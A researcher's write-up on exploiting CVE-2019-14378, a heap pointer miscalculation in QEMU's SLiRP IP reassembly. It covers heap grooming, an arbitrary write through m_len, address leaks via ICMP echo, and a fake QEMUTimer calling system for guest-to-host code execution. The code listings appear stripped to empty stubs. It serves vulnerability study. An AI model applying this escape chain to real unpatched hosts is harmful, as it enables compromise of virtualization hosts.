tl;dr
This post will describe how I exploited CVE-2019-14378, which is a pointer miscalculation in network backend of QEMU. The bug is triggered when large IPv4 fragmented packets are reassembled for processing. It was found by code auditing.
Vulnerability Details
There are two parts to networking within QEMU:
- The virtual network device that is provided to the guest (e.g. a PCI network card).
- The network backend that interacts with the emulated NIC (e.g. puts packets onto the host’s network).
By default QEMU will create a SLiRP user network backend and an appropriate virtual network device for the guest (eg an e1000 PCI card)
The bug was found in the packet reassembly in SLiRP.
IP fragmentation
IP fragmentation is an Internet Protocol (IP) process that breaks packets into smaller pieces (fragments), so that the resulting pieces can pass through a link with a smaller maximum transmission unit (MTU) than the original packet size. The fragments are reassembled by the receiving host.
1 |
|
Flags:
3 bits
- Bit 0: reserved, must be zero
- Bit 1: (DF) 0 = May Fragment, 1 = Don’t Fragment.
- Bit 2: (MF) 0 = Last Fragment, 1 = More Fragments.
- Fragment Offset: 13 bits
1 | struct mbuf { |
mbuf
structure is used to store IP layer information received. There are two buffers m_dat
which is inside the structure and m_ext
is allocated on the heap if the m_dat
is insufficient to store the packet.
For the NAT translation if the incoming packets are fragmented they should be reassembled before they are edited and re transmitted. This reassembly is done by the ip_reass(Slirp *slirp, struct ip *ip, struct ipq *fp)
function. ip
contains the current IP packet data, fp
is a link list containing the fragmented packets.
- ip_reass does the following:
- If first fragment to arrive (fp==NULL), create a reassembly queue and insert
ip
into this queue. - Check if the fragment is overlapping with previous received fragments, then discard it.
- If all the fragmented packets are received reassemble it. Create header for new ip packet by modifying header of first packet;
- If first fragment to arrive (fp==NULL), create a reassembly queue and insert
1 | /* |
The bug is at the calculation of the variable delta. The code assumes that the first fragmented packet will not be allocated in the external buffer (m_ext). The calculation q - m->dat
is valid when the packet data is inside mbuf->m_dat
( q will be inside m_dat ) ( q is structure containing link list of fragments and packet data). Otherwise if m_ext
buffer was allocated, then q will be inside the external buffer and the calculation of the delta
will be wrong.
1 | slirp/src/ip_input.c:ip_reass |
Later the newly calculated pointer q
is converted into ip
structure and values are modified, Due to the wrong calculation of the delta, ip
will be pointing to incorrect location and ip_src
and ip_dst
can be used to write controlled data onto the calculated location. This may also crash qemu if the calculated ip is located in unmaped area.
Exploitation
What are we facing
- If we control
delta
we will be able to write controlled data relative to m->m_ext. For that need precise control over the heap. - Need leaks to bypass ASLR
- There are no useful function pointers on the heap to get code execution. We have to get arbitrary write.
Controlling Heap
Let’s look into how heap objects are allocated in slirp.
1 | // How much room is in the mbuf, from m_data to the end of the mbuf |
m_get
, m_free
, m_inc
and m_cat
are wrappers for handling dynamic memory allocation. When new packet arrives new mbuf object is allocated, and if m_dat is sufficient for storing the packet data then it is used, otherwise new external buffer is allocated with m_inc
and the data is copied onto it.
1 | slirp/src/ip_input.c:ip_input |
If the incoming packet is fragmented, new mbuf
object is used to store the packets (fp) until all the fragments arrives. When next part arrives they are enqueued onto this list.
This gives us a good primitive to allocate controlled chunks on the heap size ( > 0x608 ). Few things to keep in mind is that, for every packets mbuf(0x670) will be allocated and if it is the first fragment then the another mbuf will be allocated (fp : fragment queue).
1 | malloc(0x670) |
We can use this to spray the heap,so that the subsequent allocation will be taken from the top chunk, which gives us a predictable heap state.
Getting controlled write on heap
Now that we can control the heap. Let’s see how we can use the bug to overwrite something useful.
1 | q = fp->frag_link.next; // Points to first fragment |
Assume this heap state
1 | +------------+ |
Now delta
will be -padding
and this will be added with m->m_ext
and later we can write to that offset. Thus controlling this padding we are able to control delta.
When all the fragments arrive they are concatenated to one mbuf
object with m_cat
function.
1 | slirp/src/muf.c |
The m_inc
calls realloc
function, realloc function return the same chunk if it can accommodate the requested size. So even after the reassembly of the packets, we can get the same m->m_ext buffer of the fist packet. Note, m_ext will be allocated for the first fragment packet, q
will be pointing inside this buffer . Then the addition of -padding
will also be relative to q
. This just makes things bit easier
1 | +------------+ |
So after the pointer calculation q
will be pointing to target
1 | slirp/src/ip_input.c:ip_reass |
since we control fp->ipq_src
and fp->ipq_dst
which is the source and destination ip of the packet we can overwrite targets content.
Arbitrary Write
My initial target was to overwrite the m_data
field, so that we can use the packet reassembly’s m_cat()
to get arbitrary write, but that seems to be not possible due to some alignment and offsets issues.
1 | slirp/src/muf.c:m_cat |
But was able to overwrite m_len
field of the object. Since there is no check in the m_cat
function we can use the m_len
to get arbitrary write relative to m_data
. So now we do not have the issue of alignment and we use this to overwrite the m_data
of different object to get arbitrary write.
- Send packet with id
0xdead
and MF bit set (1) - Send packet with id
0xcafe
and MF bit set (1) - Trigger the bug to overwrite m_len of
0xcafe
so that m_data + m_len points to0xdead
‘s m_data - Send packet with id
0xcafe
and MF bit unset (0) to trigger reassembly and overwrite0xdead
‘s m_data with target address - Send packet with id
0xdead
and MF bit unset (0) which will write the content of this packet to m_data.
Getting Leaks
We need leaks to bypass ASLR and PIE. For that we need some way to transfer data back to the guest . It turns out that there is a very common service that matches that description exactly: ICMP echo request. SLiRP gateway responds to a ICMP echo requests, reflecting back the payload of the packet (after the ICMP headers) unchanged.
We have arbitrary write, but where will we write to since leaks are not known at this point ?
We can do a partial overwrite of the m_data
and write data on the heap.
Leaks :
- Use arbitrary write to create fake ICMP header on the heap
- Send an ICMP request with the MF bit set (1).
- Partially Overwrite
m_data
to point to fake header on heap - Send the packet with MF bit to 0 to end the ICMP request.
- Receive leaks from the host.
Getting Code Execution
Timers (more precisely QEMUTimers) provide a means of calling a given routine (a callback) after a time interval has elapsed, passing an opaque pointer to the routine.
1 |
|
main_loop_tlg is a array in bss which contains QEMUTimerList
associated with different timer. And these contains list of QEMUTimer
structures. qemu loops through these to check whether there any of them have expired, If so, cb
function is called with argument opaque
.
RIP control :
- Create fake QEMUTimer with callback as system and opaque as the argument
- Create fake QEMUTImerList which contains our fake QEMUTimer
- Overwrite main_loop_tlg entry with fake QEMUTimerList
You can find the full exploit at CVE-2019-14378